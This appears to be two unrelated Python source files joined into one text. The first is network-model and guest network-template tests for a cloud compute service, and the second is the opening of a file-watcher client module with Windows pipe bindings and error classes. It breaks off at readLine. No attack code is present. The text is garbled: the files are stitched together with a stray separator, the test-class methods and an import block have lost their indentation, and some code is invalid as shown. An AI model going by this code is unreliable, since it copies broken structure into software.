    """Tests for ``model.NetworkInfo`` and netutils template injection.

    NOTE(review): the expected interface-file templates below are
    reproduced exactly as found in this copy of the file; any leading
    indentation or blank lines the originals carried *inside* the
    triple-quoted strings may have been lost in transit -- verify
    against the rendered template output if these assertions fail.
    """

    def test_create_model(self):
        # Two VIFs, each contributing two subnets of two fixed IPs -> 8.
        ninfo = model.NetworkInfo([fake_network_cache_model.new_vif(),
                fake_network_cache_model.new_vif(
                    {'address': 'bb:bb:bb:bb:bb:bb'})])
        self.assertEqual(
            [fake_network_cache_model.new_fixed_ip(
                {'address': '10.10.0.2'}),
             fake_network_cache_model.new_fixed_ip(
                {'address': '10.10.0.3'})] * 4, ninfo.fixed_ips())

    def test_create_async_model(self):
        # The async wrapper must behave exactly like a plain NetworkInfo.
        def async_wrapper():
            return model.NetworkInfo(
                [fake_network_cache_model.new_vif(),
                 fake_network_cache_model.new_vif(
                     {'address': 'bb:bb:bb:bb:bb:bb'})])
        ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
        self.assertEqual(
            [fake_network_cache_model.new_fixed_ip(
                {'address': '10.10.0.2'}),
             fake_network_cache_model.new_fixed_ip(
                {'address': '10.10.0.3'})] * 4, ninfo.fixed_ips())

    def test_create_async_model_exceptions(self):
        def async_wrapper():
            raise test.TestingException()
        ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
        self.assertRaises(test.TestingException, ninfo.wait)
        # 2nd one doesn't raise
        self.assertIsNone(ninfo.wait())
        # Test that do_raise=False works on .wait()
        ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
        self.assertIsNone(ninfo.wait(do_raise=False))
        # Test we also raise calling a method
        ninfo = model.NetworkInfoAsyncWrapper(async_wrapper)
        self.assertRaises(test.TestingException, ninfo.fixed_ips)

    def test_get_floating_ips(self):
        vif = fake_network_cache_model.new_vif()
        vif['network']['subnets'][0]['ips'][0].add_floating_ip('192.168.1.1')
        ninfo = model.NetworkInfo([vif,
                fake_network_cache_model.new_vif(
                    {'address': 'bb:bb:bb:bb:bb:bb'})])
        self.assertEqual(['192.168.1.1'], ninfo.floating_ips())

    def test_hydrate(self):
        ninfo = model.NetworkInfo([fake_network_cache_model.new_vif(),
                fake_network_cache_model.new_vif(
                    {'address': 'bb:bb:bb:bb:bb:bb'})])
        model.NetworkInfo.hydrate(ninfo)
        self.assertEqual(
            [fake_network_cache_model.new_fixed_ip(
                {'address': '10.10.0.2'}),
             fake_network_cache_model.new_fixed_ip(
                {'address': '10.10.0.3'})] * 4, ninfo.fixed_ips())

    def _setup_injected_network_scenario(self, should_inject=True,
                                         use_ipv4=True, use_ipv6=False,
                                         gateway=True, dns=True,
                                         two_interfaces=False,
                                         libvirt_virt_type=None):
        """Check that netutils properly decides whether to inject based on
        whether the supplied subnet is static or dynamic.
        """
        network = fake_network_cache_model.new_network({'subnets': []})
        subnet_dict = {}
        if not gateway:
            subnet_dict['gateway'] = None
        if not dns:
            subnet_dict['dns'] = None
        if not should_inject:
            # Presence of a dhcp_server marks the subnet dynamic, which
            # suppresses injection.
            subnet_dict['dhcp_server'] = '10.10.0.1'
        if use_ipv4:
            network.add_subnet(
                fake_network_cache_model.new_subnet(subnet_dict))
        if should_inject and use_ipv6:
            gateway_ip = fake_network_cache_model.new_ip(dict(
                address='1234:567::1'))
            ip = fake_network_cache_model.new_ip(dict(
                address='1234:567::2'))
            ipv6_subnet_dict = dict(
                cidr='1234:567::/48',
                gateway=gateway_ip,
                dns=[fake_network_cache_model.new_ip(
                        dict(address='2001:4860:4860::8888')),
                     fake_network_cache_model.new_ip(
                        dict(address='2001:4860:4860::8844'))],
                ips=[ip])
            if not gateway:
                ipv6_subnet_dict['gateway'] = None
            network.add_subnet(fake_network_cache_model.new_subnet(
                ipv6_subnet_dict))
        # Behave as though CONF.flat_injected is True
        network['meta']['injected'] = True
        vif = fake_network_cache_model.new_vif({'network': network})
        vifs = [vif]
        if two_interfaces:
            vifs.append(vif)
        nwinfo = model.NetworkInfo(vifs)
        return netutils.get_injected_network_template(
            nwinfo, use_ipv6=use_ipv6, libvirt_virt_type=libvirt_virt_type)

    def test_injection_dynamic(self):
        # Dynamic (DHCP) subnets produce no injected template at all.
        expected = None
        template = self._setup_injected_network_scenario(should_inject=False)
        self.assertEqual(expected, template)

    def test_injection_static(self):
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
"""
        template = self._setup_injected_network_scenario()
        self.assertEqual(expected, template)

    def test_injection_static_no_gateway(self):
        # Without a gateway the 'gateway' stanza must be omitted.
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
"""
        template = self._setup_injected_network_scenario(gateway=False)
        self.assertEqual(expected, template)

    def test_injection_static_no_dns(self):
        # Without DNS servers the 'dns-nameservers' stanza is omitted.
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
"""
        template = self._setup_injected_network_scenario(dns=False)
        self.assertEqual(expected, template)

    def test_injection_static_overriden_template(self):
        # An operator-supplied template replaces the built-in one.
        cfg.CONF.set_override(
            'injected_network_template',
            'nova/tests/unit/network/interfaces-override.template')
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip route add 0.0.0.0/24 via 192.168.1.1 dev eth0
pre-down ip route del 0.0.0.0/24 via 192.168.1.1 dev eth0
"""
        template = self._setup_injected_network_scenario()
        self.assertEqual(expected, template)

    def test_injection_static_ipv6(self):
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
iface eth0 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
gateway 1234:567::1
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
"""
        template = self._setup_injected_network_scenario(use_ipv6=True)
        self.assertEqual(expected, template)

    def test_injection_static_ipv6_no_gateway(self):
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
iface eth0 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
"""
        template = self._setup_injected_network_scenario(use_ipv6=True,
                                                         gateway=False)
        self.assertEqual(expected, template)

    def test_injection_static_with_ipv4_off(self):
        # No IPv4 subnet and no IPv6 requested -> nothing to inject.
        expected = None
        template = self._setup_injected_network_scenario(use_ipv4=False)
        self.assertEqual(expected, template)

    def test_injection_ipv6_two_interfaces(self):
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
iface eth0 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
gateway 1234:567::1
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
auto eth1
iface eth1 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
iface eth1 inet6 static
hwaddress ether aa:aa:aa:aa:aa:aa
address 1234:567::2
netmask 48
gateway 1234:567::1
dns-nameservers 2001:4860:4860::8888 2001:4860:4860::8844
"""
        template = self._setup_injected_network_scenario(use_ipv6=True,
                                                         two_interfaces=True)
        self.assertEqual(expected, template)

    def test_injection_ipv6_with_lxc(self):
        # lxc has no inet6 stanza support; IPv6 is added via post-up.
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
post-up ip -6 route add default via 1234:567::1 dev ${IFACE}
auto eth1
iface eth1 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
gateway 10.10.0.1
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
post-up ip -6 route add default via 1234:567::1 dev ${IFACE}
"""
        template = self._setup_injected_network_scenario(
            use_ipv6=True, two_interfaces=True, libvirt_virt_type='lxc')
        self.assertEqual(expected, template)

    def test_injection_ipv6_with_lxc_no_gateway(self):
        expected = """\
# Injected by Nova on instance boot
#
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
auto eth1
iface eth1 inet static
hwaddress ether aa:aa:aa:aa:aa:aa
address 10.10.0.2
netmask 255.255.255.0
broadcast 10.10.0.255
dns-nameservers 1.2.3.4 2.3.4.5
post-up ip -6 addr add 1234:567::2/48 dev ${IFACE}
"""
        template = self._setup_injected_network_scenario(
            use_ipv6=True, gateway=False, two_interfaces=True,
            libvirt_virt_type='lxc')
        self.assertEqual(expected, template)
class TestNetworkMetadata(test.NoDBTestCase):
def setUp(self):
    """Build a single-VIF NetworkInfo with one static subnet per family."""
    super(TestNetworkMetadata, self).setUp()
    self.netinfo = model.NetworkInfo([fake_network_cache_model.new_vif(
        {'type': 'ethernet'})])
    # Replace the default subnets with one IPv4 and one IPv6 subnet.
    subnet_v4 = fake_network_cache_model.new_subnet(version=4)
    subnet_v6 = fake_network_cache_model.new_subnet(version=6)
    network = self.netinfo[0]['network']
    network['subnets'][0] = subnet_v4
    network['subnets'][1] = subnet_v6
    network['meta']['mtu'] = 1500
def test_get_network_metadata_json(self):
    """One physical link plus one ipv4 and one ipv6 network are emitted."""
    net_metadata = netutils.get_network_metadata(self.netinfo,
                                                 use_ipv6=True)
    expected_link = {
        'id': 'interface0',
        'type': 'phy',
        'ethernet_mac_address': 'aa:aa:aa:aa:aa:aa',
        'vif_id': 1,
        'mtu': 1500,
    }
    expected_ipv4 = {
        'id': 'network0',
        'link': 'interface0',
        'type': 'ipv4',
        'ip_address': '10.10.0.2',
        'netmask': '255.255.255.0',
        'routes': [
            {'network': '0.0.0.0',
             'netmask': '0.0.0.0',
             'gateway': '10.10.0.1'},
            {'network': '0.0.0.0',
             'netmask': '255.255.255.0',
             'gateway': '192.168.1.1'},
        ],
        'network_id': 1,
    }
    expected_ipv6 = {
        'id': 'network1',
        'link': 'interface0',
        'type': 'ipv6',
        'ip_address': 'fd00::2',
        'netmask': 'ffff:ffff:ffff::',
        'routes': [
            {'network': '::',
             'netmask': '::',
             'gateway': 'fd00::1'},
            {'network': '::',
             'netmask': 'ffff:ffff:ffff::',
             'gateway': 'fd00::1:1'},
        ],
        'network_id': 1,
    }
    # Physical Ethernet link, then the IPv4 and IPv6 network records.
    self.assertEqual(expected_link, net_metadata['links'][0])
    self.assertEqual(expected_ipv4, net_metadata['networks'][0])
    self.assertEqual(expected_ipv6, net_metadata['networks'][1])
def test_get_network_metadata_json_dhcp(self):
    """Subnets carrying a dhcp_server are reported as *_dhcp records."""
    self.netinfo[0]['network']['subnets'][0] = (
        fake_network_cache_model.new_subnet(
            subnet_dict=dict(dhcp_server='1.1.1.1'), version=4))
    self.netinfo[0]['network']['subnets'][1] = (
        fake_network_cache_model.new_subnet(
            subnet_dict=dict(dhcp_server='1234:567::'), version=6))
    net_metadata = netutils.get_network_metadata(self.netinfo,
                                                 use_ipv6=True)
    # IPv4 network
    self.assertEqual(
        {'id': 'network0',
         'link': 'interface0',
         'type': 'ipv4_dhcp',
         'network_id': 1},
        net_metadata['networks'][0])
    # IPv6 network
    self.assertEqual(
        {'id': 'network1',
         'link': 'interface0',
         'type': 'ipv6_dhcp',
         'network_id': 1},
        net_metadata['networks'][1])
def test__get_nets(self):
    """_get_nets renders a single ipv4 network entry for the subnet."""
    expected_net = {
        'id': 'network0',
        'ip_address': '10.10.0.2',
        'link': 1,
        'netmask': '255.255.255.0',
        'network_id': 1,
        'routes': [
            {'gateway': '10.10.0.1',
             'netmask': '0.0.0.0',
             'network': '0.0.0.0'},
            {'gateway': '192.168.1.1',
             'netmask': '255.255.255.0',
             'network': '0.0.0.0'},
        ],
        'type': 'ipv4',
    }
    vif = self.netinfo[0]
    subnet = vif['network']['subnets'][0]
    self.assertEqual(expected_net,
                     netutils._get_nets(vif, subnet, 4, 0, 1))
def test__get_eth_link(self):
    """A vif-typed interface is reported with its own type string."""
    self.netinfo[0]['type'] = 'vif'
    link = netutils._get_eth_link(self.netinfo[0], 0)
    self.assertEqual(
        {'id': 'interface0',
         'vif_id': 1,
         'type': 'vif',
         'ethernet_mac_address': 'aa:aa:aa:aa:aa:aa',
         'mtu': 1500},
        link)
def test__get_eth_link_physical(self):
    """The interface id tracks the index; type stays physical ('phy')."""
    link = netutils._get_eth_link(self.netinfo[0], 1)
    self.assertEqual(
        {'id': 'interface1',
         'vif_id': 1,
         'type': 'phy',
         'ethernet_mac_address': 'aa:aa:aa:aa:aa:aa',
         'mtu': 1500},
        link)
def test__get_default_route(self):
    """Default routes derive from each subnet's gateway, if present."""
    subnets = self.netinfo[0]['network']['subnets']
    self.assertEqual(
        [{'network': '0.0.0.0',
          'netmask': '0.0.0.0',
          'gateway': '10.10.0.1'}],
        netutils._get_default_route(4, subnets[0]))
    self.assertEqual(
        [{'network': '::',
          'netmask': '::',
          'gateway': 'fd00::1'}],
        netutils._get_default_route(6, subnets[1]))
    # Test for no gateway
    subnets[0]['gateway'] = None
    self.assertEqual([], netutils._get_default_route(4, subnets[0]))
def test__get_dns_services(self):
    """Every subnet DNS entry becomes a 'dns' service record, in order."""
    subnet = fake_network_cache_model.new_subnet(version=4)
    subnet['dns'].append(
        fake_network_cache_model.new_ip({'address': '3.4.5.6'}))
    self.assertEqual(
        [{'type': 'dns', 'address': '1.2.3.4'},
         {'type': 'dns', 'address': '2.3.4.5'},
         {'type': 'dns', 'address': '3.4.5.6'}],
        netutils._get_dns_services(subnet))
def test_get_network_metadata(self):
    """End-to-end render of the network metadata document for two NICs.

    The first NIC (from setUp's netinfo) carries an IPv4 and an IPv6
    subnet; a second NIC with a single IPv4 subnet is appended below, so
    the expected document contains two links, three networks and the
    merged DNS service list.
    """
    expected_json = {
        "links": [
            {
                "ethernet_mac_address": "aa:aa:aa:aa:aa:aa",
                "id": "interface0",
                "type": "phy",
                "vif_id": 1,
                "mtu": 1500
            },
            {
                "ethernet_mac_address": "aa:aa:aa:aa:aa:ab",
                "id": "interface1",
                "type": "phy",
                "vif_id": 1,
                "mtu": 1500
            },
        ],
        "networks": [
            {
                "id": "network0",
                "ip_address": "10.10.0.2",
                "link": "interface0",
                "netmask": "255.255.255.0",
                "network_id":
                    "00000000-0000-0000-0000-000000000000",
                "routes": [
                    {
                        "gateway": "10.10.0.1",
                        "netmask": "0.0.0.0",
                        "network": "0.0.0.0"
                    },
                    {
                        "gateway": "192.168.1.1",
                        "netmask": "255.255.255.0",
                        "network": "0.0.0.0"
                    }
                ],
                "type": "ipv4"
            },
            {
                'id': 'network1',
                'ip_address': 'fd00::2',
                'link': 'interface0',
                'netmask': 'ffff:ffff:ffff::',
                'network_id': '00000000-0000-0000-0000-000000000000',
                'routes': [{'gateway': 'fd00::1',
                            'netmask': '::',
                            'network': '::'},
                           {'gateway': 'fd00::1:1',
                            'netmask': 'ffff:ffff:ffff::',
                            'network': '::'}],
                'type': 'ipv6'
            },
            {
                "id": "network2",
                "ip_address": "192.168.0.2",
                "link": "interface1",
                "netmask": "255.255.255.0",
                "network_id":
                    "11111111-1111-1111-1111-111111111111",
                "routes": [
                    {
                        "gateway": "192.168.0.1",
                        "netmask": "0.0.0.0",
                        "network": "0.0.0.0"
                    }
                ],
                "type": "ipv4"
            }
        ],
        'services': [
            {'address': '1.2.3.4', 'type': 'dns'},
            {'address': '2.3.4.5', 'type': 'dns'},
            {'address': '1:2:3:4::', 'type': 'dns'},
            {'address': '2:3:4:5::', 'type': 'dns'}
        ]
    }
    self.netinfo[0]['network']['id'] = (
        '00000000-0000-0000-0000-000000000000')
    # Add a second NIC
    self.netinfo.append(fake_network_cache_model.new_vif({
        'type': 'ethernet', 'address': 'aa:aa:aa:aa:aa:ab'}))
    address = fake_network_cache_model.new_ip({'address': '192.168.0.2'})
    gateway_address = fake_network_cache_model.new_ip(
        {'address': '192.168.0.1'})
    # The second NIC gets exactly one IPv4 subnet with no extra routes.
    ipv4_subnet = fake_network_cache_model.new_subnet(
        {'cidr': '192.168.0.0/24', 'gateway': gateway_address,
         'ips': [address], 'routes': []})
    self.netinfo[1]['network']['id'] = (
        '11111111-1111-1111-1111-111111111111')
    self.netinfo[1]['network']['subnets'][0] = ipv4_subnet
    self.netinfo[1]['network']['meta']['mtu'] = 1500
    network_json = netutils.get_network_metadata(self.netinfo)
    self.assertEqual(expected_json, network_json)
def test_get_network_metadata_no_ipv4(self):
    """With the IPv4 subnet removed, only the IPv6 network is rendered.

    Also verifies that only the IPv6 DNS servers end up in 'services'.
    """
    expected_json = {
        "services": [
            {
                "type": "dns",
                "address": "1:2:3:4::"
            },
            {
                "type": "dns",
                "address": "2:3:4:5::"
            }
        ],
        "networks": [
            {
                "network_id": 1,
                "type": "ipv6",
                "netmask": "ffff:ffff:ffff::",
                "link": "interface0",
                "routes": [
                    {
                        "netmask": "::",
                        "network": "::",
                        "gateway": "fd00::1"
                    },
                    {
                        "netmask": "ffff:ffff:ffff::",
                        "network": "::",
                        "gateway": "fd00::1:1"
                    }
                ],
                "ip_address": "fd00::2",
                "id": "network0"
            }
        ],
        "links": [
            {
                "ethernet_mac_address": "aa:aa:aa:aa:aa:aa",
                "mtu": 1500,
                "type": "phy",
                "id": "interface0",
                "vif_id": 1
            }
        ]
    }
    # drop the ipv4 subnet
    self.netinfo[0]['network']['subnets'].pop(0)
    network_json = netutils.get_network_metadata(self.netinfo)
    self.assertEqual(expected_json, network_json)
| |
# Copyright 2014-present Facebook, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name Facebook nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# no unicode literals
import inspect
import os
import math
import socket
import subprocess
import time
# Sometimes it's really hard to get Python extensions to compile,
# so fall back to a pure Python implementation.
try:
from . import bser
# Demandimport causes modules to be loaded lazily. Force the load now
# so that we can fall back on pybser if bser doesn't exist
bser.pdu_info
except ImportError:
from . import pybser as bser
from . import (
capabilities,
compat,
encoding,
load,
)
# All of the named-pipe plumbing below is only meaningful (and only
# importable) on Windows, so the ctypes bindings live behind this check.
if os.name == 'nt':
    import ctypes
    import ctypes.wintypes

    wintypes = ctypes.wintypes
    # Win32 constants used with CreateFile and overlapped I/O below.
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    FILE_FLAG_OVERLAPPED = 0x40000000
    OPEN_EXISTING = 3
    INVALID_HANDLE_VALUE = -1
    FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
    FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
    FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
    WAIT_FAILED = 0xFFFFFFFF
    WAIT_TIMEOUT = 0x00000102
    WAIT_OBJECT_0 = 0x00000000
    WAIT_IO_COMPLETION = 0x000000C0
    INFINITE = 0xFFFFFFFF

    # Overlapped I/O operation is in progress. (997)
    ERROR_IO_PENDING = 0x000003E5

    # The pointer size follows the architecture
    # We use WPARAM since this type is already conditionally defined
    ULONG_PTR = ctypes.wintypes.WPARAM

    class OVERLAPPED(ctypes.Structure):
        # Mirrors the Win32 OVERLAPPED structure used for async pipe I/O.
        _fields_ = [
            ("Internal", ULONG_PTR), ("InternalHigh", ULONG_PTR),
            ("Offset", wintypes.DWORD), ("OffsetHigh", wintypes.DWORD),
            ("hEvent", wintypes.HANDLE)
        ]

        def __init__(self):
            self.Internal = 0
            self.InternalHigh = 0
            self.Offset = 0
            self.OffsetHigh = 0
            self.hEvent = 0

    LPDWORD = ctypes.POINTER(wintypes.DWORD)

    # Declare argtypes/restype for each kernel32 entry point we call so
    # ctypes marshals arguments correctly on 32- and 64-bit builds.
    CreateFile = ctypes.windll.kernel32.CreateFileA
    CreateFile.argtypes = [wintypes.LPSTR, wintypes.DWORD, wintypes.DWORD,
                           wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
                           wintypes.HANDLE]
    CreateFile.restype = wintypes.HANDLE

    CloseHandle = ctypes.windll.kernel32.CloseHandle
    CloseHandle.argtypes = [wintypes.HANDLE]
    CloseHandle.restype = wintypes.BOOL

    ReadFile = ctypes.windll.kernel32.ReadFile
    ReadFile.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.DWORD,
                         LPDWORD, ctypes.POINTER(OVERLAPPED)]
    ReadFile.restype = wintypes.BOOL

    WriteFile = ctypes.windll.kernel32.WriteFile
    WriteFile.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.DWORD,
                          LPDWORD, ctypes.POINTER(OVERLAPPED)]
    WriteFile.restype = wintypes.BOOL

    GetLastError = ctypes.windll.kernel32.GetLastError
    GetLastError.argtypes = []
    GetLastError.restype = wintypes.DWORD

    SetLastError = ctypes.windll.kernel32.SetLastError
    SetLastError.argtypes = [wintypes.DWORD]
    SetLastError.restype = None

    FormatMessage = ctypes.windll.kernel32.FormatMessageA
    FormatMessage.argtypes = [wintypes.DWORD, wintypes.LPVOID, wintypes.DWORD,
                              wintypes.DWORD, ctypes.POINTER(wintypes.LPSTR),
                              wintypes.DWORD, wintypes.LPVOID]
    FormatMessage.restype = wintypes.DWORD

    LocalFree = ctypes.windll.kernel32.LocalFree

    GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
    GetOverlappedResult.argtypes = [wintypes.HANDLE,
                                    ctypes.POINTER(OVERLAPPED), LPDWORD,
                                    wintypes.BOOL]
    GetOverlappedResult.restype = wintypes.BOOL

    # Resolved dynamically: not present on Windows 7 and earlier, in which
    # case _get_overlapped_result_ex_impl emulates it (see below).
    GetOverlappedResultEx = getattr(ctypes.windll.kernel32,
                                    'GetOverlappedResultEx', None)
    if GetOverlappedResultEx is not None:
        GetOverlappedResultEx.argtypes = [wintypes.HANDLE,
                                          ctypes.POINTER(OVERLAPPED), LPDWORD,
                                          wintypes.DWORD, wintypes.BOOL]
        GetOverlappedResultEx.restype = wintypes.BOOL

    WaitForSingleObjectEx = ctypes.windll.kernel32.WaitForSingleObjectEx
    WaitForSingleObjectEx.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.BOOL]
    WaitForSingleObjectEx.restype = wintypes.DWORD

    CreateEvent = ctypes.windll.kernel32.CreateEventA
    CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL,
                            wintypes.LPSTR]
    CreateEvent.restype = wintypes.HANDLE

    # Windows Vista is the minimum supported client for CancelIoEx.
    CancelIoEx = ctypes.windll.kernel32.CancelIoEx
    CancelIoEx.argtypes = [wintypes.HANDLE, ctypes.POINTER(OVERLAPPED)]
    CancelIoEx.restype = wintypes.BOOL
# Number of bytes to read before bser.pdu_info can report the PDU length:
# 2 bytes marker, 1 byte int size, 8 bytes int64 value
sniff_len = 13

# This is a helper for debugging the client.
_debugging = False
if _debugging:

    def log(fmt, *args):
        # Timestamped debug output; only active when _debugging is True.
        print('[%s] %s' %
              (time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime()),
               fmt % args[:]))
else:

    def log(fmt, *args):
        # Debugging disabled: logging is a no-op.
        pass
def _win32_strerror(err):
    """ expand a win32 error code into a human readable message """
    # FormatMessage will allocate memory and assign it here
    buf = ctypes.c_char_p()
    FormatMessage(
        FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER
        | FORMAT_MESSAGE_IGNORE_INSERTS, None, err, 0, buf, 0, None)
    try:
        return buf.value
    finally:
        # the buffer was allocated by FormatMessage (ALLOCATE_BUFFER flag
        # above), so we are responsible for returning it with LocalFree
        LocalFree(buf)
class WatchmanError(Exception):
    """Base class for all errors raised by this client.

    Attributes:
      msg: human readable description of the failure (may be None)
      cmd: the watchman command being executed when the error occurred,
           if known (filled in after the fact via setCommand)
    """

    def __init__(self, msg=None, cmd=None):
        self.msg = msg
        self.cmd = cmd

    def setCommand(self, cmd):
        # Called by client.query() so the failing command shows up in the
        # rendered message.
        self.cmd = cmd

    def __str__(self):
        if self.cmd:
            return '%s, while executing %s' % (self.msg, self.cmd)
        # __str__ must return a str; returning self.msg directly raised
        # TypeError whenever msg was left at its None default.
        return str(self.msg)
class BSERv1Unsupported(WatchmanError):
    """Raised when the BSER v1 encoding cannot be used (e.g. on Python 3)."""
class WatchmanEnvironmentError(WatchmanError):
    """An OS-level (errno-carrying) failure while talking to watchman."""

    def __init__(self, msg, errno, errmsg, cmd=None):
        detail = '{0}: errno={1} errmsg={2}'.format(msg, errno, errmsg)
        super(WatchmanEnvironmentError, self).__init__(detail, cmd)
class SocketConnectError(WatchmanError):
    """Failure to establish a connection to the watchman socket."""

    def __init__(self, sockpath, exc):
        message = 'unable to connect to %s: %s' % (sockpath, exc)
        super(SocketConnectError, self).__init__(message)
        # Keep the raw ingredients around for callers that want them.
        self.sockpath = sockpath
        self.exc = exc
class SocketTimeout(WatchmanError):
    """Raised when a socket operation to/from watchman times out.

    Catching this class (rather than WatchmanError) lets callers that
    implement non-blocking loops tell a routine timeout apart from a real
    error condition.  Because it subclasses WatchmanError, existing
    handlers that catch the base class keep working unchanged.
    """
class CommandError(WatchmanError):
    """An error response returned by the watchman service.

    self.msg holds the message reported by watchman itself.
    """

    def __init__(self, msg, cmd=None):
        decorated = 'watchman command error: %s' % (msg,)
        super(CommandError, self).__init__(decorated, cmd)
class Transport(object):
    """Abstract communication channel to the watchman server."""

    # Lazily-created list of byte chunks used only by readLine().
    buf = None

    def close(self):
        """Tear the connection down."""
        raise NotImplementedError()

    def readBytes(self, size):
        """Return up to ``size`` bytes read from the server."""
        raise NotImplementedError()

    def write(self, buf):
        """Send ``buf`` to the server."""
        raise NotImplementedError()

    def setTimeout(self, value):
        pass

    def readLine(self):
